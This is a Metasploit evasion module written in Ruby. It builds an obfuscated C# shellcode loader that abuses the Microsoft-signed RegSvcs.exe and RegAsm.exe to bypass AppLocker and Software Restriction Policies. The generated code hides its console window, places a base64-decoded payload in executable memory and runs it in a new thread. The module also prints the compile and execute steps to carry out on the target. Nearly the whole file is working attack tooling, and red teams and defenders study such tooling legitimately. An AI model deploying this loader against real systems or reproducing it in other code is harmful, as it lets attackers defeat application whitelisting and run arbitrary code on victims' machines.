##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
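class MetasploitModule < Msf::Evasion

  # File names used when the corresponding option is left blank.
  DEFAULT_TXT_FILE = 'regasm_regsvcs.txt'.freeze
  DEFAULT_SNK_FILE = 'key.snk'.freeze

  # Number of distinct random identifiers substituted into the C# template.
  IDENTIFIER_COUNT = 15

  # Strong-name key (.snk) handed to csc.exe /keyfile:. RegSvcs/RegAsm register
  # the assembly as a ServicedComponent, which must be strong-named, so a key is
  # mandatory - any RSA key works. NOTE(review): this key ships in the public
  # framework source, so the public-key token of every assembly built with it is
  # a fixed, trivially fingerprintable indicator; operators who care can build
  # with their own key (e.g. one generated by `sn.exe -k`) instead.
  SNK_BASE64 = [
    'BwIAAAAkAABSU0EyAAQAAAEAAQD9yIxqf9oJgwLw6nUHqVNq4LaP+/eaL4qTT9K9aV/z7ddCP8+Uf2/47KnHklpaw+eH03ZaA2yKYBA9s+Al0VoyajA76HQp',
    'HDaCgiURBIT2GBLUGwdhoEMWX5J8eoCzkucJEjSsavQh+r9JeB6zcQvoZIx0PrpELgQc8is8j2jvsFuc5LQ8ZFoPk1273TTxKibw84HFESjxJrRtkSjwoEo4OUuZtL3C7fD',
    'gnaSoeLnMwohmyTTjt15zgBZv7xD5u/CHD4/+tySJufY5j0FkBxhyqt2DWHcmH4MQCC6PgYfIuTXEAD35o0cg+6s6pJYKB+DUCrU5vSime3jyWno9vCe87UT+fQcDrKntHB',
    'mjnj9WliAMZlU1IuCWieT7fzGZqqIsd4rrcgxetnWzaWRAkgHcTVkmVPIt0z9zHU71s7CER2viklJkiaZjRQan5ZA7bTqqsuG1xoIyXTWbKsaAMCKf5a4IJS2ImpqaYA9HR',
    'BrIV7be2o0QJxSm1LPqBXJqkAhnCpcYyfve2dql7fF+fAIDGe3ZgCEbJsfYuAaAY0snGJQhUgLmwO8GDbsbMUTuBQspDv8QXsF53UNH5v5dnOKaTfo71LrI+I5zBUqEYP3B',
    'DtK0qryu/J1eq80nPAmpNqRbFnYm1OdGKpgzHS+Ws7obPSt1HG3//BxC3a5znX0evfCfSaaWRswhjvblnh1070b3jkT6nJeksKuuVEHvudAQAtGn2vxNDs4CqrJODi5Z/BA',
    'KgpIZqQeZmh3r4Zb5OI0='
  ].join.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Applocker Evasion - Microsoft .NET Assembly Registration Utility',
        'Description' => %q{
          This module will assist you in evading Microsoft
          Windows Applocker and Software Restriction Policies.
          This technique utilises the Microsoft signed binaries
          RegAsm.exe or RegSvcs.exe to execute user supplied code.
        },
        'Author' => [
          'Nick Tyrer <@NickTyrer>', # module development
          'Casey Smith' # regasm_regsvcs bypass research
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [['Microsoft Windows', {}]],
        'References' => [
          ['URL', 'https://attack.mitre.org/techniques/T1121/'], # legacy ATT&CK ID kept for continuity
          ['URL', 'https://attack.mitre.org/techniques/T1218/009/'] # current ID: System Binary Proxy Execution: Regsvcs/Regasm
        ]
      )
    )

    register_options(
      [
        OptString.new('TXT_FILE', [true, 'Filename for the evasive file (default: regasm_regsvcs.txt)', DEFAULT_TXT_FILE]),
        OptString.new('SNK_FILE', [true, 'Filename for the .snk file (default: key.snk)', DEFAULT_SNK_FILE])
      ]
    )

    # Two artifacts are written (TXT_FILE and SNK_FILE) instead of the single
    # FILENAME the base class offers, so hide the inherited option.
    deregister_options('FILENAME')
  end

  # Base64 text of the encoded payload; the generated C# decodes it at runtime.
  def build_payload
    Rex::Text.encode_base64(payload.encoded)
  end

  # One random 8-letter identifier. Alphabetic only, so it is always a legal
  # C# identifier (never starts with a digit).
  def obfu
    Rex::Text.rand_text_alpha 8
  end

  # Returns `count` random identifiers that are guaranteed to be pairwise
  # distinct, so two template slots can never resolve to the same C# name.
  def random_identifiers(count)
    names = []
    until names.size == count
      candidate = obfu
      names << candidate unless names.include?(candidate)
    end
    names
  end

  # Renders the C# source that is written to TXT_FILE.
  #
  # The class derives from ServicedComponent and exposes a [ComRegisterFunction]
  # and a [ComUnregisterFunction]; regsvcs.exe triggers the former and
  # `regasm.exe /U` the latter, and both call the same loader. The loader hides
  # the console window (ShowWindow with SW_HIDE = 0), base64-decodes the
  # payload, VirtualAllocs a buffer with MEM_COMMIT (0x1000) and
  # PAGE_EXECUTE_READWRITE (0x40), copies the shellcode in, starts it with
  # CreateThread and waits INFINITE (0xFFFFFFFF).
  #
  # NOTE(review): an RWX private allocation followed by CreateThread into it is
  # a common memory-scanning heuristic; this module only aims at AppLocker/SRP
  # and makes no attempt to evade that class of detection.
  def regasm_regsvcs
    esc = build_payload
    mod = random_identifiers(IDENTIFIER_COUNT)
    <<~HEREDOC
      using System;
      using System.EnterpriseServices;
      using System.Runtime.InteropServices;
      namespace #{mod[0]}
      {
      public class #{mod[1]} : ServicedComponent
      {
      [ComRegisterFunction]
      public static void RegisterClass(string #{mod[2]})
      {
      #{mod[3]}.#{mod[14]}();
      }
      [ComUnregisterFunction]
      public static void UnRegisterClass(string #{mod[2]})
      {
      #{mod[3]}.#{mod[14]}();
      }
      }
      public class #{mod[3]}
      {
      private static Int32 #{mod[4]}=0x1000;
      private static IntPtr #{mod[5]}=(IntPtr)0x40;
      private static UInt32 #{mod[6]} = 0xFFFFFFFF;
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
      [System.Runtime.InteropServices.DllImport("kernel32")]
      private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
      [System.Runtime.InteropServices.DllImport("user32.dll")]
      static extern bool ShowWindow(IntPtr #{mod[7]}, int nCmdShow);
      [System.Runtime.InteropServices.DllImport("Kernel32")]
      private static extern IntPtr GetConsoleWindow();
      const int #{mod[8]} = 0;
      public static void #{mod[14]}()
      {
      IntPtr #{mod[7]};
      #{mod[7]} = GetConsoleWindow();
      ShowWindow(#{mod[7]}, #{mod[8]});
      string #{mod[9]} = "#{esc}";
      byte[] #{mod[10]} = Convert.FromBase64String(#{mod[9]});
      byte[] #{mod[11]} = #{mod[10]};
      IntPtr #{mod[12]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[11]}.Length, #{mod[4]}, #{mod[5]});
      System.Runtime.InteropServices.Marshal.Copy(#{mod[11]}, 0, #{mod[12]}, #{mod[11]}.Length);
      IntPtr #{mod[13]} = IntPtr.Zero;
      WaitForSingleObject(CreateThread(#{mod[13]}, UIntPtr.Zero, #{mod[12]}, #{mod[13]}, 0, ref #{mod[13]}), #{mod[6]});
      }
      }
      }
    HEREDOC
  end

  # Raw bytes of the strong-name key written to SNK_FILE (see SNK_BASE64).
  def snk
    Rex::Text.decode_base64(SNK_BASE64)
  end

  # Getter/setter hybrid consulted by the base class when writing a file:
  # with no argument it returns the current output name, with one it records
  # that name and returns it.
  def file_format_filename(name = '')
    @fname = name unless name.empty?
    @fname
  end

  # Returns `name` (or `default` when `name` is blank) with `ext` appended unless
  # it already ends with it (case-insensitive). Always builds a fresh string so
  # the value held in the datastore is never mutated in place.
  def with_extension(name, ext, default)
    base = name.to_s.empty? ? default : name.to_s
    base.downcase.end_with?(ext) ? base.dup : "#{base}#{ext}"
  end

  # Name of the C# source file that is written and referenced in the instructions.
  def txt_filename
    with_extension(datastore['TXT_FILE'], '.txt', DEFAULT_TXT_FILE)
  end

  # Name of the .snk file that is written and referenced in the instructions.
  def snk_filename
    with_extension(datastore['SNK_FILE'], '.snk', DEFAULT_SNK_FILE)
  end

  # Name of the assembly csc.exe will produce: only the trailing .txt is
  # swapped for .dll, so a name containing ".txt" elsewhere is left intact.
  def dll_filename
    txt_filename.sub(/\.txt\z/i, '.dll')
  end

  # Writes the C# source and the strong-name key using the resolved file names,
  # so the names printed by #instructions always match what was written.
  def create_files
    txt_file = regasm_regsvcs
    snk_file = snk
    file_format_filename(txt_filename)
    file_create(txt_file)
    file_format_filename(snk_filename)
    file_create(snk_file)
  end

  # Prints the compile/execute steps to perform on the target. 32-bit payloads
  # need the 32-bit CLR tools under Framework\; everything else uses Framework64\.
  def instructions
    txt = txt_filename
    key = snk_filename
    dll = dll_filename
    framework = payload.arch.first == ARCH_X86 ? 'Framework' : 'Framework64'
    root = "C:\\Windows\\Microsoft.NET\\#{framework}\\[.NET Version]"
    print_status "Copy #{txt} and #{key} to the target"
    print_status "Compile using: #{root}\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:#{dll} /keyfile:#{key} #{txt}"
    print_status "Execute using: #{root}\\regsvcs.exe #{dll}"
    print_status 'or'
    print_status "Execute using: #{root}\\regasm.exe /U #{dll}"
  end

  # Module entry point: write the two artifacts, then tell the operator what to do.
  def run
    create_files
    instructions
  end
end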